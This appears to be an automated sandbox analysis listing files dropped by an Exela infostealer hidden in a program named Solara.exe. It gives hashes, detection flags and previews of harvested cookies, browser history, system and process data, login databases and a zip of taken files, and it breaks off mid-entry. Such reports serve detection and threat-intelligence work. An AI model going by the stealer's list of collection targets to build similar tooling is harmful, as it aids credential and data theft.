                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================...google.com.TRUE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07...google.com.TRUE./.FALSE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA..

                                                                                                  C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Firefox\History.txt

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1707
                                                                                                  Entropy (8bit):4.080991549130857
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:L5xsMvXvxsajXJl1QXbsBQXY6CQExXBYGQ/DQq:LzlVVgmHgWdIL
                                                                                                  MD5:F18314817A772931B00698F5A9B09E9E
                                                                                                  SHA1:B744180F0287AD559E675650270FB64DC72F3293
                                                                                                  SHA-256:36A65866F8EA99B62DC1443C1177A62F51EDC513D4970D95B51AD4397B4936E1
                                                                                                  SHA-512:087C6FB37447A32F8EE62EAE88B984B4297561D77A1CA17E4B8DB520D0D93A7E30EBD7299E44178DE5078FD3FC74A443C3136966266825BAB2EE97FD792E44A8
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..=========================================================================

                                                                                                  C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\network_info.txt

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):266
                                                                                                  Entropy (8bit):4.281502386532761
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:111T8/s5hO7y9MHUXMERwLM7N3U2bX5A3EwAyEY5HLWLASPVXqI:Lv5hOP0X3RwwN3UuJA01K5CLpqI
                                                                                                  MD5:23FB26C06CE6C057071E5346E4BF5BE2
                                                                                                  SHA1:37E496FFFE731FC7AD155EE169642AF0DF7BA0C7
                                                                                                  SHA-256:C7CDD16409A9F45463E6954219417EC5C7BC4EE66A0BCACC754D8D5C221F1E55
                                                                                                  SHA-512:40E58FD7AEC9FBA2399F98374CB238B294FFF15417DBEA05DA1659158E4025795FFFE23E41BACD2A97C8F9E9FC212BF073A3C6C2BC4DB69B8BE168DDB996018B
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..8.46.123.189..United States..New York..America/New_York..Level 3 CenturyLink Communications, LLC AS3356 Level 3 Parent, LLC

                                                                                                  C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\process_info.txt

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23723
                                                                                                  Entropy (8bit):4.613580146969316
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jiRuTGmRt2RiTNNaWwlgrU0VEPzzVg4pNESw8+29hE1lEiXlqVnZfrcZTGydsTkm:VG+hiy0
                                                                                                  MD5:D2CA9C48293B11CF795EFAC8AE4B959E
                                                                                                  SHA1:49EE92FB742463EA6302E63DFE20D83E1F06FFDC
                                                                                                  SHA-256:A900711552443BA252CD34ADEC731F775194C23238AD7DA552232C662031B260
                                                                                                  SHA-512:E30F01ECA911FE868B40362384B827846C50AD71CC8D35D6B5B99148384A6A2D4C95F14E7D0C686B5382AF9C959C55FAF46931C0FB32A33267C632FAA5A005FB
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 164 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 27'356 K......Image Name: smss.exe...PID: 328...Session Name: Services...Session#: 0...Mem Usage: 1'240 K......Image Name: csrss.exe...PID: 412...Session Name: Services...Session#: 0...Mem Usage: 5'236 K......Image Name: wininit.exe...PID: 488...Session Name: Services...Session#: 0...Mem Usage: 6'740 K......Image Name: csrss.exe...PID: 496...Session Name: Console...Session#: 1...Mem Usage: 5'796 K......Image Name: winlogon.exe...PID: 556

                                                                                                  C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\system_info.txt

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):142799
                                                                                                  Entropy (8bit):4.350126960481219
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:SKfvqoX6mhzP3Z5OwXJF6Ebu02LZvzpSl79cTSIZ0tdHlwOYUBUgSgshWQCvYh/K:SKOHq9
                                                                                                  MD5:8009165433F99AE08ABB2ABD22DDB4DE
                                                                                                  SHA1:171FCD047CF9168FEE092061CA34550619B81F3F
                                                                                                  SHA-256:5E4CD31A3BD6393998F0E05162235490F2D8AF732C86D34298EA14BAFC6A757E
                                                                                                  SHA-512:CFDABE595F06E86B961E77159DFBE2586D6C5D855DC6FF6C11E05704BEC6E555DB5074D994DC4D5F722CDA543D3A5E194251AF3C0213150ECAD16B7A6DA92044
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71431-70592-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 09:52:52...System Manufacturer: pDO7PrAaXmaLVnf...System Model: LFvlO26K...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]:

                                                                                                  C:\Users\user\AppData\Local\Temp\AutofillData.db

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):1.1215420383712111
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\Cookies.db

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\DownloadData.db

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155648
                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\Exela.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Solara.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9949634
                                                                                                  Entropy (8bit):7.9953008751482715
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:196608:bvcgJ3xukvmvNm1E8giq1g9KDeNMHFJMIDJ+gsAGKkRcSRK3ICT:Lc4m1m1NqV44Fqy+gs1hOIC
                                                                                                  MD5:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  SHA1:90D67801DCFF362CE2C2ACCAFD5010C7F79567D6
                                                                                                  SHA-256:573A7F2FA701A7630318119D9E6D916CB8A0ACD87A0A2797B7197E9AE85C0071
                                                                                                  SHA-512:40D702B8FD2993AEEB09755E760D3611D76F927AE6831AB7066386D3A133257E06330DDFF2D28406B77C1D9E502E79A7A72B8984CE0D795948DA07DD03B9BEA9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...V@hg.........."....).....p...... ..........@.........................................`.................................................4...x....p..,....@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...,....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\HistoryData.db

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155648
                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\Logins.db

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):51200
                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\Solara.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Solara.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5527040
                                                                                                  Entropy (8bit):6.581917643476937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:WTbZDzL0GH1JmXFBbbYnHhcWACCR2rbh27ns0ftj371GJfo0PhtpQ9un:ebZDfHmXzIHSWbI2rAnXdxG5PhtpQM
                                                                                                  MD5:089094590DF5698B03A7428A5864ED33
                                                                                                  SHA1:6A4866B798A38E40B61095E2C4A6861B15F4CABB
                                                                                                  SHA-256:C3B138B65057D5A27D859763974A3AFE5DF2693CE64326D36AE8784D092929C7
                                                                                                  SHA-512:001C4AEEDDCBFAA9B979E81B742391C6EC6F9400B23B8B5827C69C7E8C36BD9E8576146F0487C3522DECA21E1488A36C948DFF3C69B2C441406F2081EAD09E4D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....dg.........."...........S.....@..........@..............................T...........`.................................................@...<.....P.. ...pP...............T.x...............................(.......8...............`............................text.............................. ..`.rdata...&.......(..................@..@.data....tO......^O.................@....pdata.......pP......,P.............@..@.00cfg........P.......P.............@..@.tls..........P......0P.............@....rsrc.... ....P.."...2P.............@..@.reloc..x.....T......TT.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela.zip

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:modified
                                                                                                  Size (bytes):37378
                                                                                                  Entropy (8bit):7.801976888166824
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:Y5yCR1hSgS/uzwe2teqR1pSISPuzs6xofVR1MS5S5uzj91bPR1tSFuzJGxSgd:OR1qdR12dR1QeR1E5
                                                                                                  MD5:22DE69AD3848BB983E3115496ABE474F
                                                                                                  SHA1:B9B122157C91067370C9CDF59DAA33F7D6A41D35
                                                                                                  SHA-256:15507C53894F75C8BB85CFEF7C4258A054681BD2655AAE8F987CB9627CD7748B
                                                                                                  SHA-512:F2C42C63012A1237B0E6F5717986278625174437F89E4AD85D93EBC7487EE2CE5CF94F2CDE124C8138B5EF9B55174DDC19A0455791429324E85CC7F3C28E3FAA
                                                                                                  Malicious:false
                                                                                                  Preview:PK........o.,Z................Desktop/PK........o.,Z................Documents/PK........o.,Z................Downloads/PK........o.,Z................LFOPODGVOH/PK........o.,Z................LIJDSFKJZG/PK..........EWR..............Desktop/AQRFEVRTGL.jpg..Gn@1.D..r(W.m0.........f...;!.B........u-..B:.....z.%2.0...w+..{.\q../..%..9..~K....fOMw./..uLT$_..4q.....w.=.r.Y.@......sE...,.!'QG..).y`..YSi....T...|J..\.b..;.4.Z...|.&.G...b..Iz....q6:.Y..&.c}..1.|......\@.....C..r<.E/W.Y.Hc....i.V....N..f.P.<seW...d..>s...B...BA.&..%..7e....p.Tkj.o.4.k..D*<>5@..}v9.Ur...aa..Q2...7w=...W^.,...&.J...'...u8...J....$..D._....jK].vn-.\.v}.e.p_=GO.l....n..v.hZ..{.#..J5......n.R.|..n.Q.J?_..R.t....8......Q.-..3.q.O^.I.i{.RA,D{..e..W....Y.h......,.l4ub...b...(<_.........~..r........C.s|........Jn8..`.-...6i.C?.>...PR..T.T.../i\...8....XQT.e?..!.X.$G.{~..ZZ....L....4....9......?PK..........EWR..............Desktop/AQRFEVRTGL.xlsx..Gn@1.D..r(W.m0.........f...;!.B........u-..B:...

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\AQRFEVRTGL.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\AQRFEVRTGL.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:true
                                                                                                  Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\BXAJUJAOEO.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Preview:BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\DQOFHVHTMG.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
